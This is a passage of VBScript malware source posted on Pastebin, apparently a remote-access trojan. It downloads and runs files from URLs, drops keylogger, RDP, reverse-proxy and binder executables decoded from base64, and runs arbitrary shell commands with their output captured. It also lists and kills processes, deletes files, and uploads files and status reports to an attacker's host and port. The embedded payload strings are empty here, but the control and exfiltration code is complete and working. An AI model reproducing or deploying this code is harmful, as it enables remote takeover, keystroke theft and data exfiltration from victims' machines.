  805. sub keyloggerstarter (fileurl, filename, filearg, is_offline, is_rdp)
  806. shellobj.run "%comspec% /c taskkill /F /IM " & filename, 0, true
  807. strlink = fileurl
  808. strsaveto = installdir & filename
  809.  
  810. set objfsodownload = createobject ("scripting.filesystemobject")
  811. if  objfsodownload.fileexists (strsaveto) then
  812.     objfsodownload.deletefile (strsaveto)
  813. end if
  814.  
  815. dim  objstreamdownload
  816. set  objstreamdownload = createobject("adodb.stream")
  817. with objstreamdownload
  818.     .type = 1
  819.     .open
  820.     if is_rdp = true then
  821.         .write getRDP()
  822.     else
  823.         .write getKeyLogger()
  824.     end if
  825.     .savetofile strsaveto
  826.     .close
  827. end with
  828. set objstreamdownload = nothing
  829.  
  830. if objfsodownload.fileexists(strsaveto) then
  831.    shellobj.run chr(34) & strsaveto & chr(34) & " " & host & " " & port & " " & chr(34) & filearg & chr(34) & " " & is_offline
  832. end if
  833. end sub
  834.  
  835. sub servicestarter (fileurl, filename, filearg)
  836. shellobj.run "%comspec% /c taskkill /F /IM " & filename, 0, true
  837. strlink = fileurl
  838. strsaveto = installdir & filename
  839. set objhttpdownload = createobject("msxml2.xmlhttp" )
  840. objhttpdownload.open "get", strlink, false
  841. objhttpdownload.setrequestheader "cache-control:", "max-age=0"
  842. objhttpdownload.send
  843.  
  844. set objfsodownload = createobject ("scripting.filesystemobject")
  845. if  objfsodownload.fileexists (strsaveto) then
  846.     objfsodownload.deletefile (strsaveto)
  847. end if
  848.  
  849. if objhttpdownload.status = 200 then
  850.    dim  objstreamdownload
  851.    set  objstreamdownload = createobject("adodb.stream")
  852.    with objstreamdownload
  853.         .type = 1
  854.         .open
  855.         .write objhttpdownload.responsebody
  856.         .savetofile strsaveto
  857.         .close
  858.    end with
  859.    set objstreamdownload = nothing
  860. end if
  861. if objfsodownload.fileexists(strsaveto) then
  862.    shellobj.run chr(34) & strsaveto & chr(34) & " " & host & " " & port & " " & chr(34) & filearg & chr(34)
  863. end if
  864. end sub
  865.  
  866. sub sitedownloader (fileurl,filename)
  867.  
  868. strlink = fileurl
  869. strsaveto = installdir & filename
  870. set objhttpdownload = createobject("msxml2.serverxmlhttp" )
  871. objhttpdownload.open "get", strlink, false
  872. objhttpdownload.setrequestheader "cache-control", "max-age=0"
  873. objhttpdownload.send
  874.  
  875. set objfsodownload = createobject ("scripting.filesystemobject")
  876. if  objfsodownload.fileexists (strsaveto) then
  877.     objfsodownload.deletefile (strsaveto)
  878. end if
  879.  
  880. if objhttpdownload.status = 200 then
  881.    dim  objstreamdownload
  882.    set  objstreamdownload = createobject("adodb.stream")
  883.    with objstreamdownload
  884.         .type = 1
  885.         .open
  886.         .write objhttpdownload.responsebody
  887.         .savetofile strsaveto
  888.         .close
  889.    end with
  890.    set objstreamdownload = nothing
  891. end if
  892. if objfsodownload.fileexists(strsaveto) then
  893.    shellobj.run objfsodownload.getfile (strsaveto).shortpath
  894.    updatestatus("Executed+File")
  895. end if
  896. end sub
  897.  
  898. sub download (fileurl,filedir)
  899. if filedir = "" then
  900.    filedir = installdir
  901. end if
  902.  
  903. strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
  904. set objhttpdownload = createobject("msxml2.xmlhttp")
  905. objhttpdownload.open "post","http://" & host & ":" & port &"/" & "send-to-me" & spliter & fileurl, false
  906. objhttpdownload.setrequestheader "user-agent:",information
  907. objhttpdownload.send ""
  908.      
  909. set objfsodownload = createobject ("scripting.filesystemobject")
  910. if  objfsodownload.fileexists (strsaveto) then
  911.     objfsodownload.deletefile (strsaveto)
  912. end if
  913. if  objhttpdownload.status = 200 then
  914.     dim  objstreamdownload
  915.     set  objstreamdownload = createobject("adodb.stream")
  916.     with objstreamdownload
  917.          .type = 1
  918.          .open
  919.          .write objhttpdownload.responsebody
  920.          .savetofile strsaveto
  921.          .close
  922.     end with
  923.     set objstreamdownload  = nothing
  924. end if
  925. if objfsodownload.fileexists(strsaveto) then
  926.    shellobj.run objfsodownload.getfile (strsaveto).shortpath
  927.    updatestatus("Executed+File")
  928. end if
  929. end sub
  930.  
  931. function updatestatus(status_msg)
  932.     on error resume next
  933.     set objsoc = createobject("msxml2.xmlhttp")
  934.     objsoc.open "post","http://" & host & ":" & port &"/" & "update-status" & spliter & status_msg, false
  935.     objsoc.setrequestheader "user-agent:",information
  936.     objsoc.send ""
  937.  
  938. end function
  939.  
  940. function upload (fileurl, retcmd)
  941.  
  942. dim  httpobj,objstreamuploade,buffer
  943. set  objstreamuploade = createobject("adodb.stream")
  944. with objstreamuploade
  945.      .type = 1
  946.      .open
  947.      .loadfromfile fileurl
  948.      buffer = .read
  949.      .close
  950. end with
  951. set objstreamdownload = nothing
  952. set httpobj = createobject("msxml2.xmlhttp")
  953. httpobj.open "post","http://" & host & ":" & port &"/" & retcmd, false
  954. httpobj.setrequestheader "user-agent:",information
  955. httpobj.send buffer
  956. end function
  957.  
  958.  
  959. sub deletefaf (url)
  960. on error resume next
  961.  
  962. filesystemobj.deletefile url
  963. filesystemobj.deletefolder url
  964.  
  965. end sub
  966.  
  967. function cmdshell (cmd)
  968. dim httpobj,oexec,readallfromany
  969. strsaveto = installdir & "out.txt"
  970. shellobj.run "%comspec% /c " & cmd & " > " & chr(34) & strsaveto & chr(34), 0, true
  971. readallfromany = filesystemobj.opentextfile(strsaveto).readall()
  972. filesystemobj.deletefile strsaveto
  973.  
  974. cmdshell = readallfromany
  975. end function
  976.  
  977.  
  978. function enumprocess()
  979. on error resume next
  980.  
  981. set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
  982. set colitems = objwmiservice.execquery("select * from win32_process",,48)
  983.  
  984. dim objitem
  985. for each objitem in colitems
  986.     enumprocess = enumprocess & objitem.name & "^"
  987.     enumprocess = enumprocess & objitem.processid & "^"
  988.     enumprocess = enumprocess & objitem.executablepath & spliter
  989. next
  990. end function
  991.  
  992. sub exitprocess (pid)
  993. on error resume next
  994.  
  995. shellobj.run "taskkill /F /T /PID " & pid,0,true
  996. end sub
  997.  
  998. function getParentDirectory(path)
  999.     set fo = filesystemobj.GetFile(path)
  1000.     getParentDirectory = filesystemobj.getparentfoldername(fo)
  1001. end function
  1002.  
  1003. function enumfaf (enumdir)
  1004.  
  1005. 'enumfaf = enumdir & spliter
  1006. for  each folder in filesystemobj.getfolder (enumdir).subfolders
  1007.      enumfaf = enumfaf & folder.name & "^" & "" & "^" & "d" & "^" & folder.attributes & spliter
  1008. next
  1009.  
  1010. for  each file in filesystemobj.getfolder (enumdir).files
  1011.      enumfaf = enumfaf & file.name & "^" & file.size  & "^" & file.attributes & spliter
  1012. next
  1013. end function
  1014.  
  1015. function getKeyLogger()
  1016.     encoded = "
  1017.     set spike = (CreateObject("Microsoft.XMLDOM")).createElement("tmp")
  1018.     spike.dataType = "bin.base64"
  1019.     spike.text = encoded
  1020.     getKeyLogger = spike.NodeTypedValue
  1021. end function
  1022.  
  1023. function getRDP()
  1024.     encoded = "
  1025.     set spike = (CreateObject("Microsoft.XMLDOM")).createElement("tmp")
  1026.     spike.dataType = "bin.base64"
  1027.     spike.text = encoded
  1028.     getRDP = spike.NodeTypedValue
  1029. end function
  1030.  
  1031. function getReverseProxy()
  1032.     encoded = "
  1033.     set spike = (CreateObject("Microsoft.XMLDOM")).createElement("tmp")
  1034.     spike.dataType = "bin.base64"
  1035.     spike.text = encoded
  1036.     getReverseProxy = spike.NodeTypedValue
  1037. end function
  1038.  
  1039. function getMailRec()
  1040.     encoded = ""
  1041.     set spike = (WScript.CreateObject("Microsoft.XMLDOM")).createElement("tmp")
  1042.     spike.dataType = "bin.base64"
  1043.     spike.text = encoded
  1044.     getMailRec = spike.NodeTypedValue
  1045. end function
  1046.  
  1047. function getBinder()
  1048.     encoded = "[binder]"
  1049.     if encoded <> "[binder]" then
  1050.         set spike = (CreateObject("Microsoft.XMLDOM")).createElement("tmp")
  1051.         spike.dataType = "bin.base64"
  1052.         spike.text = encoded
  1053.         getBinder = spike.NodeTypedValue
  1054.     else
  1055.         getBinder = false
  1056.     end if
  1057. end function
  1058.  
  1059. sub runBinder()
  1060. strsaveto = installdir & "ibnder.exe"
  1061.  
  1062. set objfsodownload = createobject ("scripting.filesystemobject")
  1063. if  objfsodownload.fileexists (strsaveto) then
  1064.     objfsodownload.deletefile (strsaveto)
  1065. end if
  1066.  
  1067. dim  objstreamdownload
  1068. set  objstreamdownload = createobject("adodb.stream")
  1069. with objstreamdownload
  1070.     .type = 1
  1071.     .open
  1072.     .write getBinder()
  1073.     .savetofile strsaveto
  1074.     .close
  1075. end with
  1076. set objstreamdownload = nothing
  1077.  
  1078. if objfsodownload.fileexists(strsaveto) then
  1079.    shellobj.run chr(34) & strsaveto & chr(34)
  1080. end if
  1081. end sub
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top